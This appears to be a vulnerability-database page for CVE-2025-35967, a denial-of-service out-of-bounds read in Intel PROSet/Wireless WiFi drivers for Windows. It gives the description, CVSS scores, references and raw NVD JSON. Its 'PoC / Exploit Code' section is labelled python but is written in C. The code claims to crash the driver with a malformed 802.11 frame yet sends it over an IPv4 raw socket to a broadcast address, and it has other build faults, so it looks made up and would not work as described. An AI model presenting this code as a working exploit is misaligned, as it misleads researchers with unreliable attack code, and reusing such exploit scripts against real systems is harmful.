CVE-2025-35967

Description

Out-of-bounds read for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Intel PROSet/Wireless WiFi Software for Windows < 23.160

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-35967 PoC - Intel WiFi Driver Out-of-bounds Read
// This PoC demonstrates sending a malformed wireless frame to trigger the vulnerability
// Note: Actual exploitation requires being within wireless range of target

#include <windows.h>
#include <winsock2.h>
#include <iphlpapi.h>
#include <ws2tcpip.h>
#include <winioctl.h>

#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")

// Malformed IEEE 802.11 frame structure to trigger out-of-bounds read
typedef struct {
    unsigned short frame_control;
    unsigned short duration;
    unsigned char addr1[6];
    unsigned char addr2[6];
    unsigned char addr3[6];
    unsigned short seq_control;
    unsigned char payload[256];  // Malformed payload
} __attribute__((packed)) malformed_80211_frame;

int send_malformed_frame(const char* adapter_name) {
    SOCKET sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock == INVALID_SOCKET) {
        printf("Failed to create raw socket\n");
        return -1;
    }

    // Set socket options for raw packets
    int enable = 1;
    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&enable, sizeof(enable));

    malformed_80211_frame frame = {0};
    frame.frame_control = 0x0008;  // QoS Data frame
    frame.duration = 0x013a;
    memset(frame.addr1, 0xFF, 6);  // Broadcast
    memset(frame.addr2, 0xAA, 6);
    memset(frame.addr3, 0xBB, 6);
    
    // Fill payload with specific pattern to trigger vulnerability
    memset(frame.payload, 0x41, sizeof(frame.payload));
    frame.payload[0] = 0xFF;
    frame.payload[1] = 0xFE;

    SOCKADDR_IN dest;
    dest.sin_family = AF_INET;
    dest.sin_addr.s_addr = inet_addr("192.168.1.255");

    int result = sendto(sock, (char*)&frame, sizeof(frame), 0, 
                        (SOCKADDR*)&dest, sizeof(dest));
    
    closesocket(sock);
    return result;
}

int main() {
    WSADATA wsa_data;
    WSAStartup(MAKEWORD(2, 2), &wsa_data);
    
    printf("CVE-2025-35967 PoC - Intel WiFi Driver OOB Read\n");
    printf("Target: Intel PROSet/Wireless WiFi Software < 23.160\n");
    printf("Sending malformed 802.11 frame...\n");
    
    int result = send_malformed_frame(NULL);
    if (result > 0) {
        printf("Malformed frame sent successfully\n");
    }
    
    WSACleanup();
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-35967
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-35967
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-35967/
[4] VulDB https://vuldb.com/cve/CVE-2025-35967
[5] https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-35967", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:51.187", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}